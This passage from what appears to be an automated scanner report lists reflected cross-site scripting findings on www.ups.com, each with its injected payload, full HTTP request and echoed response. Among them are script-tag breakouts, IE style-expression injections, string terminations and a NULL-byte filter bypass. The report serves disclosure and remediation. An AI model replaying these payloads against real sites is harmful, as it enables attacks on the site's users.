Date: Mon, 14 Feb 2011 01:25:40 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 61603


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enacee2"style="x:expression(alert(1))"ddaee83ec17/siteguide/index.html">
...[SNIP]...

1.104. http://www.ups.com/content/us/en/tracking/fgv/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/tracking/fgv/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c574d"style%3d"x%3aexpression(alert(1))"6d4bfc86b05 was submitted in the REST URL parameter 2. This input was echoed as c574d"style="x:expression(alert(1))"6d4bfc86b05 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usc574d"style%3d"x%3aexpression(alert(1))"6d4bfc86b05/en/tracking/fgv/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:26 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45580


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usc574d"style="x:expression(alert(1))"6d4bfc86b05/en/tracking/fgv/index.html">
...[SNIP]...

1.105. http://www.ups.com/content/us/en/tracking/fgv/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/tracking/fgv/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 743d0"style%3d"x%3aexpression(alert(1))"109bef8a77e was submitted in the REST URL parameter 3. This input was echoed as 743d0"style="x:expression(alert(1))"109bef8a77e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en743d0"style%3d"x%3aexpression(alert(1))"109bef8a77e/tracking/fgv/index.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45619


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en743d0"style="x:expression(alert(1))"109bef8a77e/tracking/fgv/index.html?WT.svl=PNRO_L1">
...[SNIP]...

1.106. http://www.ups.com/content/us/en/tracking/quantumview/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/tracking/quantumview/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edee3"style%3d"x%3aexpression(alert(1))"fe6f25a0e13 was submitted in the REST URL parameter 2. This input was echoed as edee3"style="x:expression(alert(1))"fe6f25a0e13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usedee3"style%3d"x%3aexpression(alert(1))"fe6f25a0e13/en/tracking/quantumview/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:26 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46024


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usedee3"style="x:expression(alert(1))"fe6f25a0e13/en/tracking/quantumview/index.html">
...[SNIP]...

1.107. http://www.ups.com/content/us/en/tracking/quantumview/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/tracking/quantumview/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a378c"style%3d"x%3aexpression(alert(1))"1991f7ee758 was submitted in the REST URL parameter 3. This input was echoed as a378c"style="x:expression(alert(1))"1991f7ee758 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/ena378c"style%3d"x%3aexpression(alert(1))"1991f7ee758/tracking/quantumview/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:30 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45994


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/ena378c"style="x:expression(alert(1))"1991f7ee758/tracking/quantumview/index.html">
...[SNIP]...

1.108. http://www.ups.com/content/us/en/tracking/tools/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/tracking/tools/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee59f"style%3d"x%3aexpression(alert(1))"0706a145c41 was submitted in the REST URL parameter 2. This input was echoed as ee59f"style="x:expression(alert(1))"0706a145c41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usee59f"style%3d"x%3aexpression(alert(1))"0706a145c41/en/tracking/tools/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:27 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36647


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usee59f"style="x:expression(alert(1))"0706a145c41/en/tracking/tools/index.html">
...[SNIP]...

1.109. http://www.ups.com/content/us/en/tracking/tools/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/tracking/tools/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5067b"style%3d"x%3aexpression(alert(1))"35b30889967 was submitted in the REST URL parameter 3. This input was echoed as 5067b"style="x:expression(alert(1))"35b30889967 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en5067b"style%3d"x%3aexpression(alert(1))"35b30889967/tracking/tools/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36686


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en5067b"style="x:expression(alert(1))"35b30889967/tracking/tools/index.html">
...[SNIP]...

1.110. http://www.ups.com/dropoff [WT.svl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /dropoff

Issue detail

The value of the WT.svl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae02b"><script>alert(1)</script>38862b532a9 was submitted in the WT.svl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dropoff?loc=en_US&WT.svl=ae02b"><script>alert(1)</script>38862b532a9 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:43 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30396


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<IFRAME style="height: 1200px;" src="http://maps.ups.com/UPSGlobalLocator/Search/?WT.svl=ae02b"><script>alert(1)</script>38862b532a9&loc=en_US" id="doliframe" name="doliframe" width="985" frameborder="0">
...[SNIP]...

1.111. http://www.ups.com/dropoff [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /dropoff

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee95c"><script>alert(1)</script>d2cceec571c was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dropoff?loc=ee95c"><script>alert(1)</script>d2cceec571c&WT.svl=PriNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:38 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30397


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<IFRAME style="height: 1200px;" src="http://maps.ups.com/UPSGlobalLocator/Search/?WT.svl=PriNav&loc=ee95c"><script>alert(1)</script>d2cceec571c" id="doliframe" name="doliframe" width="985" frameborder="0">
...[SNIP]...

1.112. http://www.ups.com/dropoff [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /dropoff

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d3d2"><script>alert(1)</script>ec5ea0bf3fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dropoff?9d3d2"><script>alert(1)</script>ec5ea0bf3fe=1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:31 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30381


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<IFRAME style="height: 1200px;" src="http://maps.ups.com/UPSGlobalLocator/Search/?9d3d2"><script>alert(1)</script>ec5ea0bf3fe=1" id="doliframe" name="doliframe" width="985" frameborder="0">
...[SNIP]...

1.113. https://www.ups.com/account/am/start [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /account/am/start

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload 129ef%0a3d98201dc8b was submitted in the REST URL parameter 2. This input was echoed as 129ef
3d98201dc8b
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /account/am129ef%0a3d98201dc8b/start HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44390


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...

theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/account/am129ef
3d98201dc8b
/start';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/account/am129ef

...[SNIP]...

1.114. https://www.ups.com/account/am/start [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /account/am/start

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e95b6"%20a%3db%2029ba2d4500a was submitted in the REST URL parameter 2. This input was echoed as e95b6" a=b 29ba2d4500a in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/ame95b6"%20a%3db%2029ba2d4500a/start HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:29 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44491


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/account/ame95b6" a=b 29ba2d4500a/start">
...[SNIP]...

1.115. https://www.ups.com/account/am/start [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /account/am/start

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31909'%3bb572ec76daa was submitted in the REST URL parameter 2. This input was echoed as 31909';b572ec76daa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /account/am31909'%3bb572ec76daa/start HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:33 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44407


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
c76daa/start';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/account/am31909';b572ec76daa/start';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/account/am31909';b572ec76daa/start';
actionUrl = "/one-to-one/login?ID=100&
...[SNIP]...

1.116. https://www.ups.com/account/am/start [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /account/am/start

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52ab7"%20a%3db%2059b95f1602b was submitted in the REST URL parameter 3. This input was echoed as 52ab7" a=b 59b95f1602b in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/am/start52ab7"%20a%3db%2059b95f1602b HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:44 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44491


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/account/am/start52ab7" a=b 59b95f1602b">
...[SNIP]...

1.117. https://www.ups.com/account/am/start [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /account/am/start

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript rest-of-line comment. The payload bdcfa%0ae0b29bf97aa was submitted in the REST URL parameter 3. This input was echoed as bdcfa
e0b29bf97aa
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /account/am/startbdcfa%0ae0b29bf97aa HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:49 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44390


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/account/am/startbdcfa
e0b29bf97aa
';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/account/am/startbdcfa

...[SNIP]...

1.118. https://www.ups.com/account/am/start [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /account/am/start

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 832ad'%3b70dba7c9613 was submitted in the REST URL parameter 3. This input was echoed as 832ad';70dba7c9613 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /account/am/start832ad'%3b70dba7c9613 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:47 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44407


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
7c9613';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/account/am/start832ad';70dba7c9613';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/account/am/start832ad';70dba7c9613';
actionUrl = "/one-to-one/login?ID=100&loc="
...[SNIP]...

1.119. https://www.ups.com/account/am/start [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /account/am/start

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %00e96d0</script><script>alert(1)</script>eeee4ba8d58 was submitted in the loc parameter. This input was echoed as e96d0</script><script>alert(1)</script>eeee4ba8d58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /account/am/start?loc=en_US%00e96d0</script><script>alert(1)</script>eeee4ba8d58&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
